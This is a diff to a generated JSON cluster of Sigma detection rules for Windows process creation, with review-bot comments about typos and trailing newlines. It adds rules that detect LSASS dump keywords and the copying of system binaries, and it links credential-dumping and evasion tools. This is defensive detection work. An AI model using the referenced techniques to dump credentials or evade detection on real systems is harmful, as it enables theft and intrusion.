- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.intrinsec.com/apt27-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml"
 ],
@@ -63575,8 +64585,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
 "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d",
+ "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml"
 ],
 "tags": [
@@ -63650,9 +64660,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/",
 "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5",
 "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/",
- "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"
 ],
 "tags": [
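Review bot: The new Diskshadow entry (the hunk that begins at the "Start Windows Service Via Net.EXE" context and ends at the psexec entry's `"meta": {`) carries two typos in its runtime strings, the falsepositive `False postitve might occur…` and the description `to execute an script`. Because this cluster is regenerated from SigmaHQ/sigma, a correction applied here would be overwritten; the wording should be fixed upstream in proc_creation_win_diskshadow_script_mode_susp_ext.yml (`False positive might occur…`, `to execute a script`) and picked up on the next regeneration. The description also ends in a literal `\n` while the neighbouring psexec description does not, which suggests the generator preserves YAML block-scalar trailing newlines for some rules only; trimming them in the generator would make the field uniform across entries.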
@@ -63686,8 +64696,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/tccontre18/status/1480950986650832903",
- "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
 "https://twitter.com/mrd0x/status/1461041276514623491",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml"
 ],
 "tags": [
@@ -63720,8 +64730,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md",
 "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1",
+ "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml"
 ],
 "tags": [
@@ -63756,9 +64766,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml"
 ],
 "tags": [
@@ -63792,8 +64802,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/",
- "https://twitter.com/mrd0x/status/1511415432888131586",
 "https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"
 ],
 "tags": [
@@ -63837,8 +64847,20 @@
 "https://www.mandiant.com/resources/evolution-of-fin7",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4",
 "value": "Execution of Powershell Script in Public Folder"
 },
@@ -63855,9 +64877,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/frack113/status/1555830623633375232",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
 "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
+ "https://twitter.com/frack113/status/1555830623633375232",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml"
 ],
 "tags": [
@@ -63891,14 +64913,18 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md",
+ "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn",
 "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1070"
+ "attack.impact",
+ "attack.t1070",
+ "attack.t1485"
 ]
 },
 "related": [
@@ -63908,6 +64934,13 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "related-to"
+ },
+ {
+ "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
 }
 ],
 "uuid": "add64136-62e5-48ea-807e-88638d02df1e",
@@ -64118,9 +65151,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/cloudflare/cloudflared",
 "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps",
 "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group",
- "https://github.com/cloudflare/cloudflared",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml"
 ],
 "tags": [
@@ -64169,12 +65202,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
- "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
- "https://twitter.com/JohnLaTwC/status/835149808817991680",
- "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
 "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil",
+ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://twitter.com/JohnLaTwC/status/835149808817991680",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"
 ],
 "tags": [
@@ -64207,10 +65240,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://github.com/antonioCoco/RogueWinRM",
- "https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
+ "https://github.com/antonioCoco/RogueWinRM",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
 ],
 "tags": [
@@ -64243,8 +65276,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://o365blog.com/aadinternals/",
 "https://github.com/Gerenios/AADInternals",
+ "https://o365blog.com/aadinternals/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml"
 ],
 "tags": [
@@ -64486,8 +65519,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
 "https://github.com/malcomvetter/CSExec",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml"
 ],
 "tags": [
@@ -64602,8 +65635,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nas_bench/status/1535431474429808642",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/",
+ "https://twitter.com/nas_bench/status/1535431474429808642",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml"
 ],
 "tags": [
@@ -64645,8 +65678,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
+ "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml"
 ],
 "tags": [
@@ -64781,8 +65814,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
 "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
+ "https://learn.microsoft.com/en-us/windows/package-manager/winget/source",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml"
 ],
 "tags": [
@@ -64816,8 +65849,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
+ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"
 ],
 "tags": [
@@ -64851,8 +65884,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
- "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
 "https://github.com/fireeye/DueDLLigence",
+ "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml"
 ],
 "tags": [
@@ -64918,8 +65951,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/pabraeken/status/993497996179492864",
 "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml",
+ "https://twitter.com/pabraeken/status/993497996179492864",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml"
 ],
 "tags": [
@@ -65264,10 +66297,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html",
- "https://atomicredteam.io/defense-evasion/T1220/",
 "https://twitter.com/mattifestation/status/986280382042595328",
 "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
+ "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html",
+ "https://atomicredteam.io/defense-evasion/T1220/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"
 ],
 "tags": [
@@ -65451,8 +66484,8 @@
 "refs": [
 "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
 "https://vms.drweb.fr/virus/?i=24144899",
- "https://twitter.com/JohnLaTwC/status/1415295021041979392",
 "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
+ "https://twitter.com/JohnLaTwC/status/1415295021041979392",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml"
 ],
 "tags": [
@@ -65485,8 +66518,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://sourceforge.net/projects/mouselock/",
 "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
+ "https://sourceforge.net/projects/mouselock/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml"
 ],
 "tags": [
@@ -65544,8 +66577,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml"
 ],
 "tags": [
@@ -65613,9 +66646,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml"
 ],
 "tags": [
@@ -65697,39 +66730,6 @@
 "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc",
 "value": "Sticky Key Like Backdoor Execution"
 },
- {
- "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tigzy",
- "creation_date": "2021/11/17",
- "falsepositive": [
- "Legitimate use of WinRAR in a folder of a software that bundles WinRAR"
- ],
- "filename": "proc_creation_win_winrar_execution.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/cyb3rops/status/1460978167628406785",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_execution.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f",
- "value": "Winrar Execution in Non-Standard Folder"
- },
 {
 "description": "Detects WmiPrvSE spawning a process",
 "meta": {
@@ -65844,8 +66844,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2",
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml"
 ],
 "tags": [
@@ -65880,8 +66880,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
 ],
 "tags": [
@@ -66001,8 +67001,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-",
 "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml",
+ "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml"
 ],
 "tags": [
@@ -66044,10 +67044,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
 "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml"
 ],
 "tags": [
@@ -66082,10 +67082,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
+ "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
 "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
 "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt",
- "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md",
- "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml"
 ],
 "tags": [
@@ -66139,6 +67139,44 @@
 "uuid": "744a188b-0415-4792-896f-11ddb0588dbc",
 "value": "Potential Process Injection Via Msra.EXE"
 },
+ {
+ "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\n",
+ "meta": {
+ "author": "E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2019/10/24",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_susp_lsass_dmp_cli_keywords.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Hackndo/lsassy",
+ "https://github.com/CCob/MirrorDump",
+ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
+ "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
+ "https://github.com/helpsystems/nanodump",
+ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e",
+ "value": "LSASS Dump Keyword In CommandLine"
+ },
 {
 "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)",
 "meta": {
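Review bot: The new entry's `description` ends in a literal `\n` (`...dump of the lsass process.\n`), which looks like the block-scalar terminator of the upstream YAML rule leaking through the cluster generator; the "Suspicious Copy From or To System Directory" entry added in the next hunk carries the same trailing newline, while the reworded Rundll32 description further down ends cleanly. Stripping trailing whitespace when `description` is copied into the cluster would keep the field uniform across entries and avoid a spurious blank line in tools that render it verbatim. Since this file is regenerated from the rule set, that is a generator-side fix rather than a hand edit to the JSON.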
@@ -66280,6 +67318,43 @@
 "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b",
 "value": "RunDLL32 Spawning Explorer"
 },
+ {
+ "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2020/07/03",
+ "falsepositive": [
+ "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)",
+ "When cmd.exe and xcopy.exe are called directly",
+ "When the command contains the keywords but not in the correct order"
+ ],
+ "filename": "proc_creation_win_susp_copy_system_dir.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
+ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767",
+ "value": "Suspicious Copy From or To System Directory"
+ },
 {
 "description": "Detects suspicious powershell command line parameters used in Empire",
 "meta": {
@@ -66293,9 +67368,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
- "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
 "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
+ "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
 "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml"
 ],
@@ -66362,9 +67437,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/_felamos/status/1204705548668555264",
 "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
- "https://twitter.com/_felamos/status/1204705548668555264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"
 ],
 "tags": [
@@ -66397,9 +67472,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/",
 "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png",
 "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf",
+ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml"
 ],
 "tags": [
@@ -66466,8 +67541,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
 "https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml"
 ],
 "tags": [
@@ -66586,9 +67661,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
- "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
 "https://twitter.com/lefterispan/status/1286259016436514816",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
+ "https://twitter.com/jseerden/status/1247985304667066373/photo/1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml"
 ],
 "tags": [
@@ -66624,8 +67699,20 @@
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2",
 "value": "Powershell Inline Execution From A File"
 },
@@ -66677,9 +67764,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult",
 "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
